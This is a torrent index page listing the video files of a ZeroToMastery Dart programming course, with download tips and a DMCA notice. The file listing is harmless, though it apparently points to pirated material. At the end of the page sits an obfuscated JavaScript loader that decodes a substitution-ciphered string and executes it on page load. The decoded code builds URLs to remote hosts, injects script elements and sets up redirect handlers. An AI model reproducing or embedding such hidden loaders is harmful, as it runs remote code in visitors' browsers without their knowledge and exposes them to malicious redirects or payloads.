[ZeroToMastery] Dart The Complete Developer's Guide (2021) [En]

mp4   Hot:731   Size:1.78 GB   Created:2021-06-12 18:44:01   Update:2022-12-30 10:03:56  

File List

  • 0001_Dart_The_Complete_Developer_s_Guide.mp4 19.41 MB
    0002_Making_the_most_of_this_course.mp4 14.64 MB
    0003_Introduction_to_Dart.mp4 11.51 MB
    0004_Introduction_to_Dartpad.mp4 4.74 MB
    0005_Section_Intro.mp4 2.52 MB
    0006_The_main_method.mp4 2.64 MB
    0007_Hello_world.mp4 3.84 MB
    0008_Variable_declaration_and_initialization.mp4 7.65 MB
    0009_Basic_types.mp4 6.75 MB
    0010_Exercise_printing_variables.mp4 2.94 MB
    0011_String_Concatenation_Interpolation.mp4 14.34 MB
    0012_Exercise_String_interpolation.mp4 5.05 MB
    0013_String_Escaping.mp4 9.9 MB
    0014_Multi_line_strings.mp4 4.41 MB
    0015_Basic_String_operations_uppercase_and_lowercase.mp4 8.51 MB
    0016_Initialization_vs_Assignment.mp4 4.49 MB
    0017_Exercise_Lowercase_and_uppercase_strings.mp4 2.27 MB
    0018_Finding_and_replacing_strings.mp4 11.35 MB
    0019_Conversations_between_types.mp4 11.7 MB
    0020_Arithmetic_operators.mp4 7.6 MB
    0021_Exercise_temperature_conversion.mp4 6.17 MB
    0022_Increment_decrement_operators.mp4 7.05 MB
    0023_Logical_Relational_operators.mp4 7.75 MB
    0024_Ternary_conditional_operator.mp4 5.11 MB
    0025_Hex_format_bitwise_shifting_operators.mp4 10 MB
    0026_Comments.mp4 10.79 MB
    0027_Expressions_statements.mp4 5.23 MB
    0028_Section_Intro.mp4 2.31 MB
    0029_Static_vs_Dynamic_Languages.mp4 10.07 MB
    0030_Type_inference_with_var.mp4 2.76 MB
    0031_The_final_keyword.mp4 5.9 MB
    0032_The_const_keyword.mp4 5.41 MB
    0033_Exercise_var_final_and_const.mp4 7.34 MB
    0034_The_dynamic_keyword.mp4 4.83 MB
    0035_Section_Intro.mp4 1.67 MB
    0036_If_else_statements.mp4 8.91 MB
    0037_Exercise_if_else_statements.mp4 8.38 MB
    0038_while_loops.mp4 6.35 MB
    0039_for_loops.mp4 6.35 MB
    0040_Exercise_fizz_buzz.mp4 7.96 MB
    0041_break_and_continue.mp4 10.94 MB
    0042_switch_statements.mp4 9.79 MB
    0043_enumerations.mp4 11.81 MB
    0044_Exercise_simple_calculator.mp4 8.16 MB
    0045_Section_Intro.mp4 5 MB
    0046_Installing_the_Dart_SDK.mp4 25.36 MB
    0047_Installing_and_configuring_VS_Code.mp4 17.44 MB
    0048_Project_Brief_Rock_Paper_Scissors.mp4 5.97 MB
    0049_Creating_a_command_line_app.mp4 5.62 MB
    0050_Pseudocode_for_the_game_logic.mp4 5.85 MB
    0051_Getting_use_input_with_stdin_from_dart_io.mp4 12.53 MB
    0052_Implementing_the_game_loop.mp4 9.33 MB
    0053_Implementing_the_game_logic.mp4 35.48 MB
    0054_Section_Intro.mp4 2.43 MB
    0055_Lists.mp4 9.39 MB
    0056_Exercise_Sum_of_the_items_in_a_list.mp4 2.11 MB
    0057_List_methods.mp4 9.5 MB
    0058_Type_annotations_with_lists.mp4 4.26 MB
    0059_Using_var_final_const_with_lists.mp4 6.24 MB
    0060_Sets.mp4 9.65 MB
    0061_Exercise_Sets.mp4 5.22 MB
    0062_Maps.mp4 11.79 MB
    0063_The_as_operator.mp4 3.88 MB
    0064_The_null_value.mp4 3.24 MB
    0065_Iterating_on_maps.mp4 7.83 MB
    0066_Exercise_Pizza_Ordering.mp4 6.95 MB
    0067_Nested_Collections.mp4 4.63 MB
    0068_Exercise_Restaurant_ratings.mp4 6.69 MB
    0069_Collection_if.mp4 6.49 MB
    0070_Collection_for.mp4 4.25 MB
    0071_Spreads.mp4 8.27 MB
    0072_Exercise_Shopping_List.mp4 7.81 MB
    0073_Copying_collections.mp4 11.98 MB
    0074_Section_Intro.mp4 14.55 MB
    0075_Parsing_command_line_arguments.mp4 9.31 MB
    0076_Reading_files_line_by_line.mp4 14.12 MB
    0077_Pseudocode_for_the_processing_logic.mp4 15.04 MB
    0078_Implementing_the_processing_logic.mp4 26.42 MB
    0079_Introduction_to_Null_Safety.mp4 6.41 MB
    0080_Nullable_and_non_nullable_variables.mp4 7.03 MB
    0081_Flow_Analysis_Promotion_and_Definite_Assignment.mp4 8.76 MB
    0082_The_assertion_operator.mp4 5.45 MB
    0083_The_if_null_operator.mp4 6.35 MB
    0084_Null_Safety_with_type_inference.mp4 4.1 MB
    0085_Null_Safety_with_collections.mp4 5.92 MB
    0086_The_conditional_access_operator_the_billion_dollar_mistake.mp4 9.81 MB
    0087_Section_Intro.mp4 3.24 MB
    0088_Intro_to_functions.mp4 3.2 MB
    0089_Function_arguments.mp4 12.68 MB
    0090_Return_values.mp4 4.89 MB
    0091_Exercise_Sum_of_a_list_of_numbers.mp4 5.64 MB
    0092_Named_and_positional_arguments.mp4 6.69 MB
    0093_Required_and_default_values.mp4 13.92 MB
    0094_Default_positional_arguments.mp4 5.32 MB
    0095_Exercise_Pizza_ordering_with_functions.mp4 8.91 MB
    0096_Fat_arrow_notations.mp4 2.89 MB
    0097_The_global_and_local_scope.mp4 5.03 MB
    0098_Inner_Functions.mp4 4.8 MB
    0099_Global_mutable_state_and_functions_with_side_effects.mp4 9.71 MB
    0100_Section_Intro.mp4 1.99 MB
    0101_Anonymous_functions.mp4 6.09 MB
    0102_Functions_as_first_class_objects.mp4 7.03 MB
    0103_Function_types.mp4 11.43 MB
    0104_Closures.mp4 5.19 MB
    0105_The_forEach_method.mp4 8.86 MB
    0106_The_map_method.mp4 3.87 MB
    0107_Iterable_and_toList.mp4 8.21 MB
    0108_Code_reuse_with_anonymous_functions_and_generics.mp4 29.54 MB
    0109_The_where_and_firstWhere_methods.mp4 8.83 MB
    0110_Exercise_Implement_the_where_function.mp4 8.06 MB
    0111_Ecercise_Implement_the_firstWhere_function.mp4 11.08 MB
    0112_The_reduce_method.mp4 6.05 MB
    0113_Combining_functional_operators.mp4 20.74 MB
    0114_Section_Intro.mp4 2.05 MB
    0115_Introduction_to_classes.mp4 10.28 MB
    0116_Instance_methods.mp4 11.58 MB
    0117_Class_constructors_and_the_this_keyword.mp4 6.92 MB
    0118_Initializer_lists_and_the_shorthand_syntax.mp4 16.76 MB
    0119_Classes_with_immutable_members.mp4 6.29 MB
    0120_Exercise_Creating_a_Person_class.mp4 10.51 MB
    0121_Type_safety_with_classes.mp4 7.66 MB
    0122_const_constructors.mp4 7.93 MB
    0123_Named_constructors.mp4 13.73 MB
    0124_Named_constructors_temperature_example.mp4 8.11 MB
    0125_Getters_and_setters.mp4 9.76 MB
    0126_Exercise_Restaurant_ratings_with_classes.mp4 9.88 MB
    0127_Static_methods_and_variables.mp4 9.08 MB
    0128_Private_variables_and_methods.mp4 17.1 MB
    0129_Wrap_up.mp4 3.86 MB
    0130_Section_Intro.mp4 4.36 MB
    0131_VS_Code_Dart_Setup_with_Null_Safety.mp4 22.06 MB
    0132_Introduction_to_inheritance_subclassing.mp4 15.07 MB
    0133_The_super_constructor.mp4 14.24 MB
    0134_Overriding_methods.mp4 11.33 MB
    0135_Abstract_classes.mp4 21.37 MB
    0136_Exercise_Area_and_Perimeter.mp4 9.29 MB
    0137_Interfaces_and_the_difference_between_implements_and_extends.mp4 15.61 MB
    0138_The_base_Object_class.mp4 5.83 MB
    0139_The_toString_method.mp4 9.34 MB
    0140_The_equality_operator_and_the_covariant_keyword.mp4 13.31 MB
    0141_Exercise_Implement_the_and_operators.mp4 6.95 MB
    0142_Overriding_hashCode_and_the_Equatable_package.mp4 21.62 MB
    0143_Using_classes_with_generics.mp4 9.52 MB
    0144_Composition_vs_inheritance_Flutter_widget_hierarchy_example.mp4 12.6 MB
    0145_Factory_constructors_and_reading_JSON_data.mp4 38.03 MB
    0146_Exercise_JSON_Serialization.mp4 11.44 MB
    0147_Copying_objects_with_copyWiith.mp4 12.35 MB
    0148_The_cascade_operator.mp4 12.56 MB
    0149_Simple_eCommerce_store_Overview.mp4 13.2 MB
    0150_Creating_the_Product_Item_Cart_classes.mp4 6.47 MB
    0151_Adding_the_interactive_prompt.mp4 24.65 MB
    0152_Adding_items_to_the_cart.mp4 25.92 MB
    0153_Checkout_functionality.mp4 17.97 MB
    0154_Project_structure_and_wrap_up.mp4 18.11 MB
    0155_Section_Intro.mp4 4.45 MB
    0156_Creating_and_using_mixins.mp4 12.56 MB
    0157_Mixins_Drawbacks.mp4 6.69 MB
    0158_Extensions.mp4 7.61 MB
    0159_Extensions_with_generic_type_constraints.mp4 14.15 MB
    0160_Exercise_Range_extension.mp4 6.73 MB
    0161_Section_Intr.mp4 3.39 MB
    0162_Errors_vs_Exceptions.mp4 4.83 MB
    0163_Assertions.mp4 19.13 MB
    0164_Exceptions_throw_try_catch_finally_rethrow.mp4 27.1 MB
    0165_Exercise_Email_validation.mp4 12.73 MB
    0166_Section_Intro.mp4 5.01 MB
    0167_Futures_then_catchError_whenComplete.mp4 14.67 MB
    0168_async_and_await.mp4 13.3 MB
    0169_Future_value_and_Future_error.mp4 9.63 MB
    0170_Exercise_Countdown_with_Futures.mp4 7.62 MB
    0171_Streams.mp4 13.66 MB
    0172_Stream_generators_async_and_yield.mp4 12.85 MB
    0173_Exercise_fizz_buzz_with_streams.mp4 7.1 MB
    0174_Stream_constructors.mp4 5.06 MB
    0175_Stream_methods.mp4 13.41 MB
    0176_Single_multiple_subscription_streams.mp4 6.72 MB
    0177_Weather_App_Overview.mp4 5.5 MB
    0178_REST_API_Basics.mp4 5.68 MB
    0179_Creating_the_command_line_app.mp4 3.67 MB
    0180_Creating_a_Weather_API_Client_with_the_Dart_http_package.mp4 16.45 MB
    0181_Reading_the_response_status_code_and_data.mp4 12.33 MB
    0182_Completing_the_Weather_API_Client.mp4 15.64 MB
    0183_Parsing_JSON_Data.mp4 35.09 MB
    0184_Error_Handling_and_Wrap_up.mp4 30.47 MB
    0185_Free_Dart_Flutter_eBook_40_value_Next_Steps.mp4 8.4 MB

Download Info

  • Tips

    “[ZeroToMastery] Dart The Complete Developer's Guide (2021) [En]” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();